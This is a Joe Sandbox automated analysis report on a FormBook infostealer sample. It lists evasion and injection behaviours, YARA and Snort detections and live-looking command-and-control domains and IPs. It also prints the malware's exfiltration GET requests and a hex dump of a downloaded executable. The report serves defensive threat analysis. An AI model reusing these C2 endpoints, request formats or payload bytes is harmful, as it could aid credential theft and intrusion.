Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
8hd98EhtIFcYkb8.exe

Overview

General Information

Sample name:8hd98EhtIFcYkb8.exe
Analysis ID:1465534
MD5:677b2d2d3a54e0c1d8e416b276093fb3
SHA1:22b6aa9e97cf16d55aa16dcc20fea67f9806d09c
SHA256:c42f31c68ee4a14aec74ddce249314d00813289dc36740484b09ceadf72aa0f8
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 8hd98EhtIFcYkb8.exe (PID: 3588 cmdline: "C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe" MD5: 677B2D2D3A54E0C1D8E416B276093FB3)
    • 8hd98EhtIFcYkb8.exe (PID: 4840 cmdline: "C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe" MD5: 677B2D2D3A54E0C1D8E416B276093FB3)
      • xQUrWfQeELsQZII.exe (PID: 6768 cmdline: "C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • chkntfs.exe (PID: 7640 cmdline: "C:\Windows\SysWOW64\chkntfs.exe" MD5: A9B42ED1B14BB22EF07CCC8228697408)
          • xQUrWfQeELsQZII.exe (PID: 6696 cmdline: "C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8012 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
          • aj34fjqh.exe (PID: 6180 cmdline: "C:\Users\user~1\AppData\Local\Temp\aj34fjqh.exe" MD5: A000A790579BE8EDD044A668469EA33E)
            • aj34fjqh.exe (PID: 7712 cmdline: "C:\Users\user~1\AppData\Local\Temp\aj34fjqh.exe" MD5: A000A790579BE8EDD044A668469EA33E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.1431852540.0000000001110000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.1431852540.0000000001110000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2ab20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1417f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000019.00000002.3534960934.00000000018F0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000019.00000002.3534960934.00000000018F0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a8c0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13fef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 16 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        25.2.aj34fjqh.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          25.2.aj34fjqh.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d1d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16902:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          3.2.8hd98EhtIFcYkb8.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            3.2.8hd98EhtIFcYkb8.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2d293:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x168f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
            3.2.8hd98EhtIFcYkb8.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              Click to see the 3 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Use Short Name Path in Command Line
              Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\aj34fjqh.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\aj34fjqh.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe, ParentCommandLine: "C:\Windows\SysWOW64\chkntfs.exe", ParentImage: C:\Windows\SysWOW64\chkntfs.exe, ParentProcessId: 7640, ParentProcessName: chkntfs.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\aj34fjqh.exe" , ProcessId: 6180, ProcessName: aj34fjqh.exe

              Snort Signatures

              Timestamp:07/01/24-19:25:38.686378
              SID:2855465
              Source Port:64475
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/01/24-19:25:25.124461
              SID:2855465
              Source Port:64471
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/01/24-19:27:00.696487
              SID:2855465
              Source Port:64496
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/01/24-19:26:19.230746
              SID:2855465
              Source Port:64484
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/01/24-19:24:15.086308
              SID:2855465
              Source Port:64459
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/01/24-19:25:11.804732
              SID:2855465
              Source Port:64467
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/01/24-19:26:00.592496
              SID:2855465
              Source Port:64479
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/01/24-19:26:46.825321
              SID:2855465
              Source Port:64492
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/01/24-19:24:37.172413
              SID:2855465
              Source Port:64463
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/01/24-19:23:35.528269
              SID:2855465
              Source Port:49712
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/01/24-19:26:33.240207
              SID:2855465
              Source Port:64488
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: 8hd98EhtIFcYkb8.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://www.foryourhealth19.com/ym7q/Avira URL Cloud: Label: malware
              Source: http://www.ridcoredry.live/blq3/?Lb=GFtlIrHx8T50&FTP84=/QAAm0GouadCsSjm0XCQ0NNd9BYFgPCeNdHOqYXBISGV1GFo4SB1zqqUvhYZ4jEo/5lijPf3qt+9x6u7W4DslmBYMZTBtvuPQphb+44RgWDcLgkceETeTezSGqdjX9slNk8GIp6396hvAvira URL Cloud: Label: phishing
              Source: http://www.foryourhealth19.com/ym7q/?Lb=GFtlIrHx8T50&FTP84=UxZF11kgGMhVJ3h1mYaBYZj5xwuySTV9/R2JXFp47AYwysMhWE1l+EvBnUyCPTtksKPA2Ite2ltCL7XTNGD56H2fTiCax6/BQq0vjYK7AyFfq6kTJWJKbnRCSHQhd4Mpl36RQO9kaMTfAvira URL Cloud: Label: malware
              Source: http://www.ridcoredry.live/blq3/Avira URL Cloud: Label: phishing
              Multi AV Scanner detection for submitted file
              Source: 8hd98EhtIFcYkb8.exeReversingLabs: Detection: 28%
              Yara detected FormBook
              Source: Yara matchFile source: 25.2.aj34fjqh.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.8hd98EhtIFcYkb8.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.8hd98EhtIFcYkb8.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.aj34fjqh.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.1431852540.0000000001110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.3534960934.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.3530426239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3705299437.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.3708009401.0000000005850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3705534069.0000000004500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.1433410329.00000000020C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.3705085363.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\EuOdzX7Ehz6t1H3[1].exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: 8hd98EhtIFcYkb8.exeJoe Sandbox ML: detected
              Source: 8hd98EhtIFcYkb8.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 8hd98EhtIFcYkb8.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: XOyN.pdb source: EuOdzX7Ehz6t1H3[1].exe.14.dr, aj34fjqh.exe.14.dr
              Source: Binary string: chkntfs.pdbGCTL source: 8hd98EhtIFcYkb8.exe, 00000003.00000002.1431730936.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, xQUrWfQeELsQZII.exe, 0000000D.00000003.1370660862.000000000067B000.00000004.00000020.00020000.00000000.sdmp, xQUrWfQeELsQZII.exe, 0000000D.00000002.3701797109.0000000000668000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: xQUrWfQeELsQZII.exe, 0000000D.00000000.1357259966.000000000055E000.00000002.00000001.01000000.0000000D.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000002.3691801922.000000000055E000.00000002.00000001.01000000.0000000D.sdmp
              Source: Binary string: wntdll.pdbUGP source: 8hd98EhtIFcYkb8.exe, 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000003.1431710177.0000000004448000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000003.1433783281.00000000045FA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: 8hd98EhtIFcYkb8.exe, 8hd98EhtIFcYkb8.exe, 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, chkntfs.exe, 0000000E.00000003.1431710177.0000000004448000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000003.1433783281.00000000045FA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: chkntfs.pdb source: 8hd98EhtIFcYkb8.exe, 00000003.00000002.1431730936.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, xQUrWfQeELsQZII.exe, 0000000D.00000003.1370660862.000000000067B000.00000004.00000020.00020000.00000000.sdmp, xQUrWfQeELsQZII.exe, 0000000D.00000002.3701797109.0000000000668000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: XOyN.pdbSHA256 source: EuOdzX7Ehz6t1H3[1].exe.14.dr, aj34fjqh.exe.14.dr
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_005ABE80 FindFirstFileW,FindNextFileW,FindClose,14_2_005ABE80
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 4x nop then jmp 026E23FCh0_2_026E2698
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 4x nop then xor eax, eax14_2_00599790
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 4x nop then mov ebx, 00000004h14_2_045F053E

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:49712 -> 217.160.0.31:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:64459 -> 172.67.194.145:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:64463 -> 38.55.194.30:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:64467 -> 46.30.215.51:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:64471 -> 74.208.236.162:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:64475 -> 192.250.231.28:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:64479 -> 162.0.238.43:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:64484 -> 43.198.80.127:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:64488 -> 45.130.41.249:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:64492 -> 91.195.240.123:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:64496 -> 38.207.19.49:80
              Performs DNS queries to domains with low reputation
              Source: DNS query: www.tufftiff.xyz
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 17:26:06 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 27 Jun 2024 06:51:42 GMTETag: "aaa00-61bd9903d370d"Accept-Ranges: bytesContent-Length: 698880Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 85 20 ef 82 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 a0 0a 00 00 08 00 00 00 00 00 00 be bf 0a 00 00 20 00 00 00 c0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c bf 0a 00 4f 00 00 00 00 c0 0a 00 d4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0a 00 0c 00 00 00 40 9e 0a 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 9f 0a 00 00 20 00 00 00 a0 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d4 05 00 00 00 c0 0a 00 00 06 00 00 00 a2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 0a 00 00 02 00 00 00 a8 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 bf 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 d4 8c 00 00 2c 6c 00 00 03 00 00 00 14 00 00 06 00 f9 00 00 40 a5 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9e 02 72 01 00 00 70 73 15 00 00 0a 7d 01 00 00 04 02 14 7d 02 00 00 04 02 28 16 00 00 0a 00 00 02 28 05 00 00 06 00 2a 13 30 07 00 a9 01 00 00 01 00 00 11 00 02 7b 01 00 00 04 6f 17 00 00 0a 00 72 bc 00 00 70 02 7b 01 00 00 04 73 18 00 00 0a 0a 06 6f 19 00 00 0a 0b 2b 1a 00 02 7b 16 00 00 04 6f 1a 00 00 0a 07 16 6f 1b 00 00 0a 6f 1c 00 00 0a 26 00 07 6f 1d 00 00 0a 13 04 11 04 2d da 02 7b 01 00 00 04 6f 1e 00 00 0a 00 02 7b 01 00 00 04 6f 17 00 00 0a 00 72 f2 00 00 70 02 7b 01 00 00 04 73 18 00 00 0a 0c 08 6f 19 00 00 0a 0d 38 0b 01 00 00 00 02 7b 04 00 00 04 6f 1f 00 00 0a 72 93 01 00 70 6f 20 00 00 0a 6f 21 00 00 0a 72 a5 01 00 70 17 8d 18 00 00 01 25 16 09 16 6f 1b 00 00 0a a2 6f 22 00 00 0a 26 02 7b 04 00 00 04 6f 1f 00 00 0a 72 93 01 00 70 6f 20 00 00 0a 6f 21 00 00 0a 72 b5 01 00 70 17 8d 18 00 00 01 25 16 09 17 6f 1b 00 00 0a a2 6f 22 00 00 0a 26 02 7b 04 00 00 04 6f
              Source: Joe Sandbox ViewIP Address: 162.0.238.43 162.0.238.43
              Source: Joe Sandbox ViewIP Address: 84.32.84.32 84.32.84.32
              Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
              Source: Joe Sandbox ViewASN Name: LILLY-ASUS LILLY-ASUS
              Source: Joe Sandbox ViewASN Name: ONECOMDK ONECOMDK
              Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: global trafficHTTP traffic detected: GET /ky1l/?Lb=GFtlIrHx8T50&FTP84=rq50Wd1lMHFX8odFqcPFBXSYTeLeWZzOZdEKt1q2Ng0jiW/1UU7Cv6Tb1vTcZWKNTv6a7aX5qQrtM6kOVx9AgvgUe5/Bja5gpUFr8IDyktkkvNGNZ4xEuXwKitfXYUFnVmIVCEjvmGcp HTTP/1.1Host: www.erhaltungsmassage.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /ym7q/?Lb=GFtlIrHx8T50&FTP84=UxZF11kgGMhVJ3h1mYaBYZj5xwuySTV9/R2JXFp47AYwysMhWE1l+EvBnUyCPTtksKPA2Ite2ltCL7XTNGD56H2fTiCax6/BQq0vjYK7AyFfq6kTJWJKbnRCSHQhd4Mpl36RQO9kaMTf HTTP/1.1Host: www.foryourhealth19.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /80eg/?Lb=GFtlIrHx8T50&FTP84=/gUd74TM946IZLQfFCjFFoMEh/bZ058Y5fxYbd7lsAuEu+8WJ/21FtYOGJlKUg3YeQ1lkwlhlDEwsFjwCVkjP3HgvWH+eFvT+Cr55kx1O3kSIIeygKzK78qTqiVgNqoEH3t5dFc0+pi4 HTTP/1.1Host: www.86wqi.cyouAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /e5cg/?FTP84=+iRPR6b0cHsvtSIKktiBhFksQ3J0g8xQjEPnQEYx5YYVoEZd7QcDm2acLw7Tj1bPoKM8M2uZ1cEL1EuWaogQQhFlafU2EKFDhhDWP+Lh20TqHHOR+DrFC95KlJHLt9tMC+FdDZkSCqct&Lb=GFtlIrHx8T50 HTTP/1.1Host: www.vivaepicmarbella.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /u4jq/?Lb=GFtlIrHx8T50&FTP84=CDJU9pFFzFP5Q+XwrjtzU7ALaZIX7Qr7xG0Tk3i+702mxinN9hpFEu+s7zPr8ql7seaWvhcu7+p+54MBjhZ2jhTmPmJLv4ka4ysGmOJ/DhiKAPXXpWbDV/sLTxWyGr8frfPdUs+6sgZH HTTP/1.1Host: www.lookstudiov.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /b9jt/?FTP84=I6wqk3vZ0MIwducyeDc5a1RUJrCEqnXhmjD4iKeo+QzF3CVziIh9NSuBhJSHyIOtb6QEc0JQU3wLuke4KM9e0eKAxB2ADTUoySVeubTpqpeKSrgjLWx1k8qzQ8FFILh8qZ99MFd/cRWi&Lb=GFtlIrHx8T50 HTTP/1.1Host: www.cr-pos.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
